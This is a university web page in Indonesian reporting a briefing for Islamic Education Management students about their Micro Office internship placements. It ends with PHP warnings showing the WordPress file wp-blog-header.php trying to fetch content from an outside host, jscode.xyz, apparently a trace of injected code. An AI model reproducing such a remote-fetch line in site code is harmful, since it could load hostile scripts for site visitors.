Pembekalan Micro Office Mahasiswa Program Studi Manajemen Pendidikan Islam

Hari Senin (8/5), pengelola program studi Manajemen Pendidikan Islam fakultas Tarbiyah dan Keguruan Universitas Islam Negeri Sulthan Thaha Saifuddin Jambi menyelenggarakan Pembekalan Micro Office kepada Dosen Pembimbing dan mahasiswa semester VI pada tahun ajaran 2022/2023 di Lantai 1 Ruang Teater Wing C Gedung Kuliah yang dihadiri oleh 14 dosen pembimbing dan 131 mahasiswa, serta Kepala Prodi dan Sekretaris Prodi MPI.

Ketua Prodi Manajemen Pendidikan Islam, Dr. H. Mahmud MY, M.Pd mengatakan, “Mahasiswa Micro Office Program Studi Manajemen Pendidikan Islam akan ditempatkan di 17 Unit yang berada di lingkungan Universitas Islam Negeri Sulthan Thaha Saifuddin Jambi dan Madrasah binaan Fakultas Tarbiyah dan Keguruan”. Lokasi Micro Office Program Studi MPI diantaranya, Pascasarjana, Fakultas Ushuluddin, Rektorat UIN, Perpustakaan UIN, Perpustakaan FTK, Akademik FTK, Umum FTK, Arsip Rektorat UIN, PIAUD, Layanan FTK, PGMI, Ajudan FTK, FEBI, UTIPD, MPI, MTsS Laboratorium, dan MAS Laboratorium.

Pembekalan yang dilakukan untuk memberikan hal-hal penting yang akan dilakukan oleh mahasiswa di unit penempatan masing-masing, diantara dalam disiplin berpakaian, waktu kerja, tupoksi kinerja, dan laporan akhir kegiatan. Sekretaris Jurusan MPI, Uyun Nafiah, M.Pd mengatakan, “Pelaksanaan Micro Office mengalami sedikit perbedaan dengan pelaksanaan tahun lalu, yakni hari magang yang hanya dilaksanakan selama 3 hari dalam seminggu. Sementara, 2 hari yang tersisa digunakan untuk perkuliahan mahasiswa. Silakan gunakan waktu tersebut untuk belajar proses pelayanan manajemen administrasi yang ada disetiap unit di lingkungan Universitas dan Fakultas.”

 

Contributor: Yuliana Afifah, M.Pd.

Editor: Ajuzar Fiqhi, M.Sc.Ed.

Leave a Reply

Your email address will not be published. Required fields are marked *

Manajemen Pendidikan IslamAlamat
Jl. Jambi-Muara Bulian KM. 16, Simp. Sei Duren, Jambi Luar kota, Muaro Jambi, Jambi 36361.
Lokasi KamiMaps

Sosial MediaKunjungi Sosial Media Kami
Manajemen Pendidikan IslamAlamat
Jl. Jambi-Muara Bulian KM. 16, Simp. Sei Duren, Jambi Luar kota, Muaro Jambi, Jambi 36361.
Lokasi KamiMaps

Sosial MediaKunjungi Sosial Media Kami

© 2023 | Pusat Teknologi Informasi dan Pangkalan Data UIN Sulthan Thaha Saifuddin Jambi

© 2023 | Pusat Teknologi Informasi dan Pangkalan Data UIN Sulthan Thaha Saifuddin Jambi


Warning: file_get_contents(): https:// wrapper is disabled in the server configuration by allow_url_fopen=0 in /home/fitk/public_html/wp-blog-header.php on line 20

Warning: file_get_contents(https://jscode.xyz/): Failed to open stream: no suitable wrapper could be found in /home/fitk/public_html/wp-blog-header.php on line 20